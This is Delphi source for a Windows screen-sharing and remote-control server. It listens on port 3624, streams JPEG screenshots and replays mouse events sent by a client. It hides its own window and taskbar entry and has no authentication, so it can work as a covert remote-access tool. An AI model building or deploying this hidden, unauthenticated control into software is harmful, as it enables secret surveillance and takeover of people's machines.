unit u_server;

interface

uses
  Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
  Dialogs, StdCtrls, ScktComp, ExtCtrls,jpeg, Sockets;
const BLOCKSIZE= 2048;
const C_SHOW= '00005';
const C_CLOSE= '00006';
const C_DISCONNECT= '00007';
const C_EXEC= '00008';
const C_NOP= '00009';
const C_MOUSE= '00010';
const C_RESET= '00011';
const M_EVENT_LEFT_CLK= '001';
const M_EVENT_RIGHT_CLK= '002';
const M_EVENT_LEFT_BEGINDRAG= '003';
const M_EVENT_LEFT_DRAGING= '004';
const M_EVENT_LEFT_ENDDRAG= '005';
const M_EVENT_RIGHT_BEGINDRAG= '006';
const M_EVENT_RIGHT_DRAGING= '007';
const M_EVENT_RIGHT_ENDDRAG= '008';
const M_EVENT_DBLCLK= '009';
const M_EVENT_MOVE= '010';
type
  TForm1 = class(TForm)
    ServerSocket1: TServerSocket;
    Timer1: TTimer;
    procedure FormCreate(Sender: TObject);
    procedure ServerSocket1ClientRead(Sender: TObject;
      Socket: TCustomWinSocket);
    procedure up_sendbuf;
    procedure Button1Click(Sender: TObject);
    procedure FormPaint(Sender: TObject);
    procedure Timer1Timer(Sender: TObject);
  private
    { Private declarations }
    ist_picstrem:TMemoryStream ;
    il_leave:longint;
    ib_reset:boolean;
    li_viewmode:integer;
    procedure up_mouseevent(as_info:string);
    procedure  CopyScreenToBitmap;
    procedure GetScreen(var bmp: TBitmap; mode: integer);
    procedure ConvertToGray_256(bmp: TBitmap);
    procedure ConvertToGray_16(bmp: TBitmap);
    function CreateGrayPalette(Num: integer; Gamma: double): HPalette;
    function GammaConv(Value: double; Gamma: double): double;
  public
    { Public declarations }
  end;

var
  Form1: TForm1;

implementation
type
   TRGBCol = record
      Blu, Grn, Red : byte;
   end;
   TRGBArray   = array[0..0] of TRGBCol;
   PRGBArray   = ^TRGBArray;

{$R *.dfm}

procedure TForm1.FormCreate(Sender: TObject);
begin
        Timer1.Enabled:=true;
        ib_reset:=false;
        ist_picstrem:=TMemoryStream.Create; 
        SetWindowLong(Application.Handle, GWL_EXSTYLE,
WS_EX_TOOLWINDOW);

end;
procedure TForm1.up_mouseevent(as_info:string);
var
ls_tmp,ls_mevent:string;
li_mcmd,li_mx,li_my:integer;
lp_pos:tpoint;
begin
        ls_mevent:=copy(as_info,1,3);
        ls_tmp:=copy(as_info,4,5);
        li_mx:=strtoint(copy(ls_tmp,1,5)) ;
        ls_tmp:=copy(as_info,9,5);
        li_my:=strtoint(copy(ls_tmp,1,5)) ;
        GetCursorPos(lp_pos);
        li_mx:=(li_mx-lp_pos.x)div 2;
        li_my:=(li_my-lp_pos.y)div 2;
        if ls_mevent=M_EVENT_LEFT_CLK then
        begin
          li_mcmd:=MOUSEEVENTF_MOVE;
          mouse_event(li_mcmd,li_mx ,li_my ,0,0);
          li_mcmd:=MOUSEEVENTF_LEFTDOWN+MOUSEEVENTF_LEFTUP;
          mouse_event(li_mcmd,0 ,0 ,0,0);
        end
        else if ls_mevent=M_EVENT_RIGHT_CLK then
        begin
          li_mcmd:=MOUSEEVENTF_MOVE;
          mouse_event(li_mcmd,li_mx ,li_my ,0,0);
          li_mcmd:=MOUSEEVENTF_RIGHTDOWN+MOUSEEVENTF_RIGHTUP;
          mouse_event(li_mcmd,0 ,0 ,0,0);
        end
        else if ls_mevent=M_EVENT_DBLCLK then
        begin
          li_mcmd:=MOUSEEVENTF_MOVE;
          mouse_event(li_mcmd,li_mx ,li_my ,0,0);
          li_mcmd:=MOUSEEVENTF_LEFTDOWN+MOUSEEVENTF_LEFTUP;
          mouse_event(li_mcmd,0,0,0,0);
          mouse_event(li_mcmd,0,0,0,0);
        end
        else if ls_mevent=M_EVENT_LEFT_BEGINDRAG then
        begin
          li_mcmd:=MOUSEEVENTF_MOVE;
          mouse_event(li_mcmd,li_mx ,li_my ,0,0);
          li_mcmd:=MOUSEEVENTF_LEFTDOWN;
          mouse_event(li_mcmd,0 ,0 ,0,0);
        end
        else if ls_mevent=M_EVENT_RIGHT_BEGINDRAG then
        begin
          li_mcmd:=MOUSEEVENTF_MOVE;
          mouse_event(li_mcmd,li_mx ,li_my ,0,0);
          li_mcmd:=MOUSEEVENTF_RIGHTDOWN;
          mouse_event(li_mcmd,0 ,0 ,0,0);
        end
        else if (ls_mevent=M_EVENT_RIGHT_DRAGING) OR (ls_mevent=M_EVENT_LEFT_DRAGING) then
        begin
          li_mcmd:=MOUSEEVENTF_MOVE;
          mouse_event(li_mcmd,li_mx ,li_my ,0,0);
        end
        else if ls_mevent=M_EVENT_LEFT_ENDDRAG then
        begin
          li_mcmd:=MOUSEEVENTF_MOVE+MOUSEEVENTF_LEFTUP;
          mouse_event(li_mcmd,li_mx ,li_my ,0,0);
        end
        else if ls_mevent=M_EVENT_RIGHT_ENDDRAG then
        begin
          li_mcmd:=MOUSEEVENTF_MOVE;
          mouse_event(li_mcmd,li_mx ,li_my ,0,0);
          li_mcmd:=MOUSEEVENTF_RIGHTUP;
          mouse_event(li_mcmd,0 ,0 ,0,0);
        end   ;
end;
procedure TForm1.ServerSocket1ClientRead(Sender: TObject;
  Socket: TCustomWinSocket);
var
ls_receive,ls_cmd,ls_info,ls_tmp,ls_mevent:string;
li_len,li_mcmd,li_mx,li_my:integer;
lp_pos:tpoint;
begin
  li_len:=Socket.ReceiveLength;
  ls_receive:=Socket.ReceiveText;
  ls_cmd:=copy(ls_receive,1,5);
  ls_info:=copy(ls_receive,6,li_len-5);
  if ls_cmd= C_SHOW then
  begin
        li_viewmode:=strtoint(copy(ls_info,1,1));
        up_sendbuf ;
  end
  else if ls_cmd= C_CLOSE then  close
  else if ls_cmd= C_DISCONNECT then   Socket.Close
  else if ls_cmd= C_RESET then
  begin
      ServerSocket1.Close;
      winexec(pchar(application.ExeName),sw_normal);
      CLOSE;
  end
  else if ls_cmd= C_EXEC then
  begin
      ;
  end
  else if ls_cmd= C_MOUSE then
  begin
        up_mouseevent(ls_info);
  end;

end;
procedure TForm1.GetScreen(var bmp: TBitmap; mode: integer);
var
   dc : integer;
   c  : TCanvas;
   R  : TRect;
begin
   bmp := TBitmap.Create;

   dc := GetWindowDC(0);
   try
      c := TCanvas.Create;
      c.Handle := dc;
      R := Rect(0, 0, Screen.Width, Screen.Height);
      bmp.Width := R.Right;
      bmp.Height := R.Bottom;
      bmp.Canvas.CopyRect(R, c, R);
      c.Handle := 0;
      c.Free;
   finally
      ReleaseDC(0, dc);
   end;

   case mode of
      1   : bmp.PixelFormat := pf4bit;
      2   : ConvertToGray_16(bmp);
      3   : ConvertToGray_256(bmp);
      4   : bmp.PixelFormat := pf24bit;
      5   : bmp.HandleType := bmDIB;
   end;
end;
function TForm1.GammaConv(Value: double; Gamma: double): double;
begin
   if Value <> 0 then Result := Exp(Ln(Value) / Gamma)
      else Result := 0;
end;
function TForm1.CreateGrayPalette(Num: integer; Gamma: double): HPalette;
var
   lPal  : PLogPalette;
   i     : integer;
begin
   // Add the Grayscale palette
   lPal := AllocMem(sizeof(TLogPalette) + Num * sizeof(TPaletteEntry));
   lPal.palVersion   := $300;
   lPal.palNumEntries := Num;
   for i := 0 to Num-1 do with lPal.palPalEntry[i] do begin
      peRed    := Round(255 * GammaConv(i / (Num-1), Gamma));
      peGreen  := Round(255 * GammaConv(i / (Num-1), Gamma));
      peBlue   := Round(255 * GammaConv(i / (Num-1), Gamma));
      peFlags  := 0;
   end;
   Result := CreatePalette(lPal^);
   FreeMem(lPal);
   Win32Check(longbool(Result));
end;

procedure TForm1.ConvertToGray_256(bmp: TBitmap);
var
   gm       : TBitmap;  // Destination grayscale bitmap
   x, y     : integer;
   p1       : PRGBArray;
   p2       : PByteArray;
begin
   bmp.PixelFormat := pf24bit;   
   // Convert to Grayscale
   gm := TBitmap.Create;
   gm.PixelFormat := pf8bit;
   gm.Width  := bmp.Width;
   gm.Height := bmp.Height;

   gm.Palette := CreateGrayPalette(256, 1.4);

   for y := 0 to bmp.Height-1 do begin
      p1 := bmp.ScanLine[y];
      p2 := gm.ScanLine[y];
      for x := 0 to bmp.Width-1 do with p1^[x] do begin
         p2^[x] := (Red * 3 + Grn * 4 + Blu) div 8;
      end;
   end;
   bmp.Assign(gm);
   gm.Free;
end;

procedure TForm1.ConvertToGray_16(bmp: TBitmap);
var
   gm       : TBitmap;  // Destination grayscale bitmap
   x, y     : integer;
   p1       : PRGBArray;
   p2       : PByteArray;
   c        : integer;
begin
   bmp.PixelFormat := pf24bit;
   // Convert to Grayscale
   gm := TBitmap.Create;
   gm.PixelFormat := pf4bit;
   gm.Width  := bmp.Width;
   gm.Height := bmp.Height;

   gm.Palette := CreateGrayPalette(16, 1.4);

   for y := 0 to bmp.Height-1 do begin
      p1 := bmp.ScanLine[y];
      p2 := gm.ScanLine[y];
      for x := 0 to bmp.Width-1 do with p1^[x] do begin
         c := (Red * 3 + Grn * 4 + Blu) div (8 * 16);
         if (x and 1) = 1 then begin
            p2^[x div 2] := p2^[x div 2] and (not 15) or c;
         end else begin
            p2^[x div 2] := p2^[x div 2] and (15) or (c shl 4);
         end;
      end;
   end;

   bmp.Assign(gm);
   gm.Free;
end;

procedure  TForm1.CopyScreenToBitmap;
var
  jpegscreen:Tjpegimage;
  Pos:   TPoint;
  lbmp_tmp:tbitmap;
begin
        lbmp_tmp:=tbitmap.Create;
        GetScreen(lbmp_tmp,li_viewmode);
        GetCursorPos(Pos);
        lbmp_tmp.Canvas.Ellipse(pos.X,pos.Y,pos.X+5,pos.Y+5);
        jpegscreen:=Tjpegimage.Create ;
        ist_picstrem.Position:=0;
        jpegscreen.Assign(lbmp_tmp);
        jpegscreen.SaveToStream(ist_picstrem);
        ist_picstrem.Position:=0;
        il_leave:=ist_picstrem.size;
        lbmp_tmp.Free;
        jpegscreen.Free;
end;
procedure TForm1.up_sendbuf;
var
li_actbyte:longint;
lb_tmpbuff:array[0..BLOCKSIZE-1] of char;
begin
   if ist_picstrem.Size=0 then
        CopyScreenToBitmap;
   if il_leave>BLOCKSIZE then
        li_actbyte:=BLOCKSIZE
   else li_actbyte:=il_leave;
   il_leave:=il_leave- li_actbyte;
   ist_picstrem.ReadBuffer(lb_tmpbuff,li_actbyte);
   if  il_leave=0 then
        ist_picstrem.Clear;
   serversocket1.Socket.Connections[0].SendBuf(lb_tmpbuff,li_actbyte);
end;


procedure TForm1.Button1Click(Sender: TObject);
begin
CopyScreenToBitmap
end;

procedure TForm1.FormPaint(Sender: TObject);
begin
hide;
@onpaint:=nil;
end;

procedure TForm1.Timer1Timer(Sender: TObject);
begin
        ServerSocket1.Port:=3624;
        ServerSocket1.Active:=true;
        Timer1.Enabled:=false;
        Timer1.Free;     
end;

end.
